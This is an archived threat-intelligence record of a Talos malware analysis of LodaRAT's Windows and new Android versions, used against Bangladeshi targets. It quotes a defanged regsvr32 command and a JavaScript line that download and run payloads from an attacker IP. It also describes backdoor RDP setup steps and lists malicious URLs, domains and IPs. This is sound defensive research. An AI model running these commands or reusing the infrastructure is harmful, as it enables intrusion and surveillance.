{
	"id": "3da81b27-499f-49d0-a521-86944ae28d1c",
	"created_at": "2026-04-06T00:19:55.703633Z",
	"updated_at": "2026-04-10T13:12:44.647569Z",
	"deleted_at": null,
	"sha1_hash": "24211af7530ea9279fc5bb20af8324ddea37b125",
	"title": "Kasablanka Group's LodaRAT improves espionage capabilities on Android and Windows",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 733326,
	"plain_text": "Kasablanka Group's LodaRAT improves espionage capabilities on\r\nAndroid and Windows\r\nBy Vitor Ventura\r\nPublished: 2021-02-09 · Archived: 2026-04-05 20:35:56 UTC\r\nThe developers of LodaRAT have added Android as a targeted platform.\r\nA new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities.\r\nThe operators behind LodaRAT tied to a specific campaign targeting Bangladesh, although others have\r\nbeen seen.\r\nKasablanca, the group behind LodaRAT, seems to be motivated by information gathering and espionage\r\nrather than direct financial gain. Threat actors attempt to evolve over time and the ones behind Loda are no\r\ndifferent. Loda now has an Android version. Just like its Windows version, the Android version is also a\r\nremote access tool (RAT) with the features one would expect out of this kind of malware. This Android\r\nRAT had been previously referred to as \"Gaza007.\" However, Talos linked it to the Loda developers and\r\nuncovered a full campaign targeting Bangladeshi users. This shows a resourceful adversary evolving their\r\ntoolkit into other platforms. It is unclear if the campaign operators are the same as the developers, but there\r\nis no doubt they must work closely together. To protect against this actor, each individual in an\r\norganization must be careful with documents attached to emails and be vigilant before clicking on links.\r\nOrganizations can protect themselves by monitoring domains resolutions using Umbrella, for instance, and\r\nprotecting endpoints using Cisco AMP.\r\nWhat's new?  \r\nLodaRAT operators and/or developers now have a new tool, Loda4Android. This new malware follows the same\r\nprinciples of other Android-based RATs that we have seen on the threat landscape. Along with this new Android\r\nvariant, an updated version of Loda for Windows has been identified in the same campaign. These new versions\r\nfor Loda4Windows and Loda4Android show that the development effort is clearly carried out by the same group\r\nwe are calling \"Kasablanca.\"\r\nHow did it work?\r\nTalos identified hybrid campaigns targeting Windows and Android users. The authors developed an Android-based\r\nRAT following the same principles as other RATs. However, they specifically avoided techniques often used by\r\nbanking trojans, like the Accessibility APIs. The underlying command and control (C2) protocol follows the same\r\ndesign pattern as the Windows version, suggesting that the C2 code will handle both versions. Talos researchers\r\nhave found both reversions reporting to the same C2 hostname and port, further confirming our assertions.\r\nSo what?\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 1 of 11\n\nThe fact that the threat group has moved into hybrid campaigns targeting Windows and Android shows a group\r\nthat is thriving and evolving. Giving that there are indications that the group using LodaRAT is looking for direct\r\nfinancial gain (there is no related ransomware or banking activity), organizations and individuals should be aware\r\nof this threat group.\r\nThe Bangladesh campaign\r\nInfrastructure\r\nTalos has identified a campaign starting October 2020 and was still active at the time of writing this article, which\r\nis now targeting Windows and Android platforms. The hostname info.v-pn[.]co was first recorded with malicious\r\nactivity on July 2, 2020 being used as C2 for Loda, this is the exact same day that the domain was also registered.\r\nEver since this date, this host has been used to malicious activities related with Loda. Changing several IP several\r\ntimes over the past seven months.\r\nThe Windows version (see details below) uses the IP 107.172.30[.]213 as the dropper site, which hosts the\r\ndownload scripts (first stage) and main payload.\r\nFor this specific campaign, the malicious actors used the IP address 160.178.220[.]194 as a C2 and as hosting site\r\nfor the Android version in its early stages, the following samples also changed their C2 to info.v-pn[.]co.\r\nBased on the certificate fingerprint used to sign both Android samples, we believe the C2 recently changed to\r\ninfo.v-pn[.]co and the distribution is currently being carried out from a newly identified domain lap-top[.]xyz.\r\nA development release (with an internal RFC1918 address used 192.168.1.169 as C2) signed by the same\r\ncertificate was submitted anonymously to VirusTotal from the same Moroccan geographic region as the\r\ngeolocation of the IP (160.178.220[.]194) used in the early stages of the campaign, which suggests that the\r\ndevelopers of Loda4Android are potentially based in Morocco.\r\nVictimology\r\nThe operators of this Loda campaign appear to have a specific interest in Bangladesh-based organizations, namely\r\nbanks and carrier-grade voice-over-IP software vendors, which we observed on several lures attempting to\r\ndistribute the malware droppers. The default victim ID on the Windows version is \"munafa,\" which is the Urdu\r\nand Bengalese word for \"profit.\"\r\nAmong the samples we found reporting to the same C2, Talos identified the lures outlined in the table below.\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 2 of 11\n\nThere are clear signs that each sample is being created by a common builder. All the Android samples we analyzed\r\nare signed by the same certificate and share the exact manifest file and pre-built configuration. The base package\r\nis the same for all \"AL-Furqan.Academy_v1.0\", which is a legitimate application available on the Google Play\r\nstore and belonging to an Egyptian-based Islamic college.\r\nInitial vector\r\nThe distribution method used in this case is very similar to what we've seen previously. Adversaries use a\r\nmalicious RTF document that exploits CVE-2017-11882 — a memory corruption vulnerability in Microsoft\r\nOffice — that, in turn, downloads a malicious SCT file. For more information on how Loda has leveraged CVE-2017-11882, please see our previous post on LodaRAT.\r\nThe documents analyzed during this investigation do not employ any obfuscation. The payload for the exploit is in\r\nplain text and can be easily viewed.\r\nThe second stage of this infection chain diverts from the techniques Loda has previously employed. As shown\r\nabove, the payload runs the following command:\r\nregsvr32 /s /u /n /i:hxxp://107[.]172[.]30[.]213/5[.]sct scrobj.dll\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 3 of 11\n\nThis is a known technique for bypassing AppLocker in Windows by abusing the regsvr32 command. Using this\r\ntechnique, an attacker can download and execute an SCT file while simultaneously bypassing Applocker.\r\nThe malicious SCT file is essentially an XML file that contains JavaScript that downloads and executes the Loda\r\nbinary. We located the GitHub repository the threat actor used as a template for the SCT file. The comments in the\r\ntemplate were not removed from the payload used in this campaign, as seen below:\r\nThe line \"\"Object.Open(\"GET\", \"hxxp://107[.]172[.]30[.]213/Flash.exe\", false);\" initiates the download of the\r\nLoda binary then executes it.\r\nMalware\r\nMalware design similarities\r\nBefore we delve into the malware, details it's important to explain why Talos has determined with high confidence\r\nthat the developers/operators behind Loda are the same behind this new Loda4Android sample. Talos has found\r\nmultiple similarities across the C2 protocol, code level and infrastructure. The image below shows the levels of\r\nsimilarity in the C2 beacon protocol.\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 4 of 11\n\nTalos also found some similarities in the beacon creation routine. Both versions have two variables with similar\r\nnames with the same value, \"x,\" which are then used in the protocol in the same positions. The figure above shows\r\nthe protocol layout, in the table below you can see each step.\r\nAnd in the infrastructure similarities, previous Loda campaigns used both Windows and Android samples using\r\nthe same hardcoded C2 domain as Loda4Android that runs on the same port.\r\nWe often find that snippets of code in malware and general app development are re-used or obtained from other\r\nsources. In this instance, we clearly see that this actor has potentially leveraged code from GitHub and this, again,\r\nis very common across app development. The interesting thing here is that the protocol similarities are unlikely to\r\nhave been copied by another group behind Loda4Android, as this would require the C2 to have the same\r\ncapabilities to interact with the new Android malware.\r\nLoda4Android malware\r\nMost commands are exactly what one would expect of an Android RAT and are summarized in the manifest.\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 5 of 11\n\nIt has all the components of a stalker application — the malware can record users' location and environment audio,\r\nas well as take photos and screenshots. It can record audio calls, but only what the targeted user says, not the user\r\non the other end of the call. The common SMS, call log and contact exfiltration functionalities are also present.\r\nLoda4Android is not capable of intercepting SMS messages or phone calls, though, as is commonly seen in other\r\nbanking trojans.\r\nThis RAT reads the SMS and call log from the regular storage. It can also send SMS and perform calls to specific\r\nnumbers. Device-wise, it acquires a list and launches applications, or it can play a ringtone.\r\nThere are also two other interesting features — including a built-in Facebook phishing kit. At this time, the\r\ncontents are hardcoded but it shouldn't be surprising that in future versions this may dynamically load the content\r\ntargeting other platforms.\r\nThe malware also contains a command- and script-running capability, which provides the malware flexibility to\r\nperform a wide range of tasks. For example, it could download one of the available Android exploits and obtain\r\nroot, or it could download a new APK and install it. In this case, user interaction is required. Talos also discovered\r\nthe malware had been identified as \"Gaza007 RAT\" in this post, which contains a full list of commands with a\r\nshort description.\r\nThe C2 hostname and port are both hardcoded in the sample in plain text. The main C2 contact loop will sleep for\r\nfive seconds until the network is available. Once it establishes contact with the C2, it runs another loop, this time\r\non a half-second interval.\r\nAfter starting the C2 contact service, if the bindx flag is set to 1, the malware will read a resource with the name\r\n\"sss,\" saving its contents into \"//sdcard/.app.apk\". This will then be installed using the standard intent mechanism\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 6 of 11\n\nprovided by the operating system. This is a common method to hide the installation of the malware, hoping to\r\ndisguise the malicious application by also installing legitimate software, similar to the trojanized installers used on\r\nother platforms.\r\nThe code analysis did not show any mechanism to change the bindx flag value in runtime, which suggests this is a\r\nconfiguration made at build time, a commonly used malware-building tool.\r\nWindows Loda version 1.1.8\r\nThe Windows-based samples identified during this investigation are updated versions of LodaRAT. While mostly\r\nremaining the same as previously discovered versions, new commands have been added that extend its capabilities\r\nand utilize a slightly different infection chain. The new version number of 1.1.8 can be found in the initial C2\r\nbeacon, as shown below:\r\nMultiple commands in Loda have been updated or are entirely new additions. The most notable of these\r\ncommands gives the threat actor remote access to the target machine via RDP. To achieve this, Loda first changes\r\na few security configurations in Windows:\r\nSet the registry entry \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\r\nServer\\fDenyTSConnections\" to \"0\". This will allow RDP connections to be made.\r\nTurn off the Windows firewall\r\nAdd a user called \"-Guest\" with a password of \"123\"\r\nEnable logging in via network without a password by setting the registry entry\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" to \"0\"\r\nAfter these changes are made, an unidentified networking utility named \"nx.exe\" establishes a connection on the\r\nstandard RDP port 3389. This utility was not observed during analysis, as the threat actor must send Loda a URL\r\nto download the executable from.\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 7 of 11\n\nAnother notable new command is \"Sound|\" which uses the BASS audio library to capture audio from a connected\r\nmicrophone. Several functions are called from a BASS audio DLL which Loda has named \"bacb.dll.\" The\r\nfunctions that are called to record audio are:\r\nBASS_ErrorGetCode\r\nBASS_RecordGetDeviceInfo\r\nBASS_RecordInit\r\nBASS_RecordSetDevice\r\nBASS_RecordFree\r\nBASS_Encode_Start\r\nBASS_Encode_Stop\r\nThis new command is an improvement on the previous \"Sound\" command which used Windows' built-in Sound\r\nRecorder. The reason for abandoning the previous method is likely because Windows Sound Recorder can only\r\nrecord audio for a maximum of 60 seconds. The new method allows for any length of recording time specified by\r\nthe threat actor.\r\nFor more information on earlier versions of LodaRAT, please see our previous blogs LodaRAT grows up and\r\nLodaRAT update: Alive and well.\r\nConclusion\r\nThe threat actor behind Loda is diversifying its target platforms and continuously improving functionality. Along\r\nwith these improvements, the threat actor has now focused on specific targets, indicating more mature operational\r\ncapabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat,\r\nas they can lead to a significant data breach or heavy financial loss. The group has decided to deploy a cross-platform malware with some additional capabilities, suggesting they have their eyes on targeting larger\r\norganizations over time. As always we encourage users to be vigilant when they're clicking on or opening any\r\nlinks via email or SMS message. This actor has made use of squatted domains to try and preserve some legitimacy\r\nhowever, as detailed, these are made to look familiar to the real domains to try and lure the user in without\r\nnoticing.\r\nCoverage\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 8 of 11\n\nIOCs\r\nURLs\r\nhxxps://lap-top[.]xyz/mobile/Lap-top%20Security_Setup.apk\r\nhxxps://av24[.]co/Virus_Cleaner_Setup.msi\r\nhxxp://bdpolice[.]co/answer-paper-demo.zip\r\nhxxps://isiamibankbd[.]com/tv/TPTUMC.exe\r\nhxxps://bangladesh-bank[.]com/PBVANA.doc\r\nhxxp://bangladesh-bank[.]com/invoice.zip\r\nhxxp://zep0de.com/viewticket.exe\r\nhxxp://bracbank[.]info/munafa[.]php\r\nhxxp://107[.]172[.]30[.]213/Flash.exe\r\nDomains\r\ninfo.v-pn[.]co\r\nlap-top[.]xyz\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 9 of 11\n\nav24[.]co\r\nbdpolice[.]co\r\nisiamibankbd[.]com\r\nbangladesh-bank[.]com\r\nzep0de.com\r\nBracbank[.]info\r\nIPs\r\n160.178.220[.]194\r\n194.5.98[.]55\r\n107.172.30[.]213\r\nHashes\r\n91b6ea9fccb4eae21335588bc83dea09780a5b7e145721f7098baafa2072286a\r\n52b6db0fec7f587505aabfe091d8e0751acd8d4f4d120eeba5519c25a6dd8673\r\n977a9d25972b999ae3b12d12e12978f4d116b5fb713c76c57998be15b4172def\r\n68b221360edf4802b470fbc86493025707cf4913cc15729f4bc6ec149a4dc7ba\r\n59f29819d223e47099ca0f00fd6bc4335d7b95188d623bf0c78c8e594c0c69c7\r\nfbb8a86f399491ea5633df62f66bec1e4d4d5531f1dff976da1a3091b8ea4f34\r\n4fa5525008128f77562fbb64af82b2fbcbc6c0afe71d567470380dc4476184a9\r\nc3afaf555eabe5e40dcb87d2c292491e561b2dadcb1998f508088ba3bcac6836\r\n677db7d296e4bea770f99f34e70be72b8a2b910b661804592202f3a4834ef102\r\n4f319b2518d855803e678713cf4b6cae975ebdd60cc1174f1609bbb9ea76f007\r\n01f44cdc139eca65f02bfe1a8918a0d073e89bc19350262dc9d10a564863fdfd\r\n7a55844f86b49e103564750a37604954590d27686f7f7bc8e5ae6101e8e18424\r\nce2276bbb6423015a4f2e80f320e068b8f53f7c19a43fb0a6f9aa5784e716d6e\r\nbf6f5a2730ced754907e277b590959d9c734681a07a466112c392e92d008fea3\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 10 of 11\n\nSource: https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nhttps://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html"
	],
	"report_names": [
		"kasablanka-lodarat.html"
	],
	"threat_actors": [
		{
			"id": "d4135989-e577-4133-bdae-a24243c832a4",
			"created_at": "2023-11-05T02:00:08.068657Z",
			"updated_at": "2026-04-10T02:00:03.396218Z",
			"deleted_at": null,
			"main_name": "Kasablanka",
			"aliases": [],
			"source_name": "MISPGALAXY:Kasablanka",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434795,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24211af7530ea9279fc5bb20af8324ddea37b125.pdf",
		"text": "https://archive.orkl.eu/24211af7530ea9279fc5bb20af8324ddea37b125.txt",
		"img": "https://archive.orkl.eu/24211af7530ea9279fc5bb20af8324ddea37b125.jpg"
	}
}